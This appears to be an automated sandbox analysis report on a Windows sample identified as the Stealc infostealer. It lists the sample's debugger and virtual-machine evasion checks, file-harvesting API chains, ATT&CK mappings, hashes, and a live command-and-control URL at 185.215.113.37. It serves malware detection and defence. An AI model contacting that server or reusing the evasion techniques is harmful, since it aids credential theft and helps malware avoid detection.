                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A381D7 second address: A381E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B6EF second address: A3B6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B6F5 second address: A3B6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0336 second address: 4DA033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA033C second address: 4DA0340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0340 second address: 4DA0375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAC5254A95h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA03A1 second address: 4DA0404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, C4h 0x0000000d pushfd 0x0000000e jmp 00007FAAC5092E69h 0x00000013 add si, 63F6h 0x00000018 jmp 00007FAAC5092E61h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FAAC5092E63h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0404 second address: 4DA0421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0421 second address: 4DA045F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAC5092E63h 0x00000009 or ch, 0000003Eh 0x0000000c jmp 00007FAAC5092E69h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA045F second address: 4DA0472 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0472 second address: 4DA049B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 mov ax, di 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA049B second address: 4DA04DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FAAC5254A8Ch 0x0000000b xor eax, 6D3730F8h 0x00000011 jmp 00007FAAC5254A8Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAAC5254A95h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04DA second address: 4DA04E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957B00 second address: 957B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957B04 second address: 957B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957C70 second address: 957C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957C76 second address: 957CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAC5092E67h 0x00000013 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7A19D9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 95DE18 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9D48B3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00554910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0054DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0054E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00554570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0054ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0054BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00553EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00541160 GetSystemInfo,ExitProcess,0_2_00541160
                Source: file.exe, file.exe, 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2174797423.0000000001099000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareUjOz
                Source: file.exe, 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2174797423.0000000001053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13607
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13604
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13658
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13626
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13618
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005445C0 VirtualProtect ?,00000004,00000100,000000000_2_005445C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00559860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559750 mov eax, dword ptr fs:[00000030h]0_2_00559750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00557850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2748, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00559600
                Source: file.exe, file.exe, 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: AProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00557B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00556920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00556920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00557850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00557A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00557A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2133685233.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2748, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2133685233.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2748, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php~16%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpL17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpd17%VirustotalBrowse
                http://185.215.113.37/ws17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php717%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpK17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php~file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpLfile.exe, 00000000.00000002.2174797423.0000000001088000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpKfile.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.2174797423.000000000100E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37efile.exe, 00000000.00000002.2174797423.000000000100E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpdfile.exe, 00000000.00000002.2174797423.0000000001088000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/wsfile.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/e2b1563c6670f193.phpftfile.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php7file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmptrueunknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.37
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1523815
                    Start date and time:2024-10-02 05:01:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 80%
                    • Number of executed functions: 19
                    • Number of non-executed functions: 85
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.951358282912511
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'860'608 bytes
                    MD5:2252ee92f584848eac43445204fec9a4
                    SHA1:411ee89cbdcd58f985efce1c042d851b391c5643
                    SHA256:00f85df4b3b992ef1030c3b26626c3bd961f66eabfc26b9c49d52953415d288b
                    SHA512:b3da7770e51cf346c7492dd56ea0852b4002e801097a58d90c5b26adfc35fb814571c723e15495821af7470ce3febb8bf219bd4b7e7060448139b62e3c58d5ed
                    SSDEEP:24576:eXhk2UMJ30ZhbqaZulyAdmKTgBfRWAAbd1GYhqUb7Y8PuHCZVJd2RDWHYhU3Bt2b:eXKXm0X1GmvHrAZQjiZV2pW4hw69ci
                    TLSH:4D853396B62EE7A4CAE800B09DB243DD03B637410C883CD35B9972A19D2FF754DB9E45
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                    File Icon

                    Icon Hash:00928e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0xaa7000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007FAAC51DFAAAh
                    cmovb ebx, dword ptr [eax+eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    jmp 00007FAAC51E1AA5h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ebx], al
                    or al, byte ptr [eax]
                    add byte ptr [0700000Ah], al
                    or al, byte ptr [eax]
                    add byte ptr [edx], al
                    or al, byte ptr [eax]
                    add byte ptr [ebx], cl
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [edi], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
